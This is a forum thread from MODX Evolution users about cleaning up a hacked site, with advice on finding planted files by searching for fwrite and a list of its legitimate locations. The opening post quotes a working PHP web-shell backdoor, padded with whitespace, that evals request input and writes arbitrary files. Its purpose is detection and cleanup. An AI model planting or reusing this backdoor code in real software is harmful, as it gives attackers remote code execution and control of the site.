We launched new forums in March 2019—join us there. In a hurry for help with your website? Get Help Now!
    • 9207 ☆ A M B ☆
    • 2,475 Posts
    I'm posting to raise some awareness of this and see if anyone has any pointers or similar experiences that might help me track down the cause. I'm cleaning up a hacked Evo site... it was running something else before it got upgraded, and it's possible the hack occurred before we upgraded to 1.0.8. But then we kept finding junk on the server (hacker junk ... spam emails going out, all of that).

    What I've found is a few index.php inside "discreet" locations that are designed to write payloads to the site. E.g. inside assets/cache/index.php, I see this code:

    <?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $acbg = "c18eb49f0db2d26b08e63c54d5f1bc4e"; 
    if(isset($_REQUEST['qelf'])) { 
    $toteot = $_REQUEST['qelf']; eval($toteot); exit(); 
    } 
    if(isset($_REQUEST['lmuban'])) { 
    $kurxiw = $_REQUEST['yqxeryk']; 
    $luozk = $_REQUEST['lmuban']; 
    $ayplhp = fopen($luozk, 'w'); 
    $tkjad = fwrite($ayplhp, $kurxiw); 
    fclose($ayplhp); 
    echo $tkjad; 
    exit(); 
    }
    ?>


    Similar code was found inside manager/media/script/forIE/index.php.

    So a hacker can post to these files and create payloads anywhere on the site. Pretty nasty. The big question is how did these get there? I'm continuing to sniff around.

    It should be noted that upgrading would not fix these holes: we gotta wipe the directory clean, install a fresh version of MODX, then reload the database and add known-clean versions of Snippets etc. back in. [ed. note: Everettg_99 last edited this post 13 years, 7 months ago.]
      • 37099
      • 338 Posts
      Thanks for the info.


      I shall check my evo sites in those locations for that file and let you know.
        • 9207 ☆ A M B ☆
        • 2,475 Posts
        The files were EVERYWHERE -- the script that installed them obviously did a scan for all possible locations where it could write an index.php (seems it stuck to that file name for some reason): variable names were randomized so it made it much harder to find. Here are a few more examples:


        • manager/media/browser/mcpuk/connectors/php/dtd/index.php
        • manager/media/ImageEditor/img/index.php
        • manager/media/script/forIE/index.php
        • assets/plugins/tinymce3241/jscripts/tiny_mce/themes/index.php
        • assets/plugins/managermanager/index.php

        All told, I found close to 50 of these backdoors on my site. It could be easy to miss one, and then you'd have the problem on your hands all over again, so do a scan for any files that are using fwrite.
          • 37099
          • 338 Posts
          I checked my 9 sites using "grep -r fwrite *" and found between 20 & 70 files using fwrite on each site depending on the number of snippets etc.

          All the uses looked legitimate ie no seemingly random generated variable names.

          All the sites have been kept fairly up-to-date

          Not much help to you i'm afraid, but hopefully it's leftovers from an old exploit, rather than a new one, that you can now clear up without any more problems.
            • 40447
            • 165 Posts
            "grep -r fwrite *"
            What command is grep and in what interpreter/script is it used ? I'm looking for ways to be able to scan a website/database for things that should not be there.
              • 37099
              • 338 Posts
              Quote from: sitecms at Feb 14, 2013, 03:34 AM
              "grep -r fwrite *"
              What command is grep and in what interpreter/script is it used ? I'm looking for ways to be able to scan a website/database for things that should not be there.

              My sites are hosted on linux servers, that's a standard linux command-line command there are probably equivalents for other operating systems but i'm not familiar with them.
                • 40447
                • 165 Posts
                My sites are also hosted on linux servers. Guess I have a new field to dive into smiley
                  • 9207 ☆ A M B ☆
                  • 2,475 Posts
                  A simple command to search across multiple files using grep is this:

                  grep -rl 'fwrite' .


                  Where "fwrite" is our search term and "." is the current directory (could also be /full/path/to/dir). That's one of the singularly most useful bits of shell code ever.

                  Yeah, I think what happened here is that the site was exploited when it was running 1.0.2 (or whatever it was running before we updated), and then we failed to notice the backdoors when we updated, so the hacks persisted after updating to 1.0.8.
                    • 9995
                    • 1,613 Posts
                    Been there too, I deleted all snippets / modules and plugins and re-uploaded clean ones. TinyMCE has so too many maps. There even where files lower as public_html. Asked the provider/host for a final check. If you miss one file you prob. can start all over again.

                      Evolution user, I like the back-end speed and simplicity smiley
                      • 9207 ☆ A M B ☆
                      • 2,475 Posts
                      Yeah, hacks are a pain. For the record, fwrite should occur in only a handful of MODX Evo files. Here's a list of legitimate locations of files containing fwrite in a MODX Evo site:


                      • manager/actions/files.dynamic.php
                      • manager/includes/document.parser.class.inc.php
                      • manager/media/browser/mcpuk/connectors/php/connector.php

                      Some add-ons like SimpleSearch will also use fwrite. If you see them anywhere else, you should carefully inspect the file contents to make sure it's not a malicious script.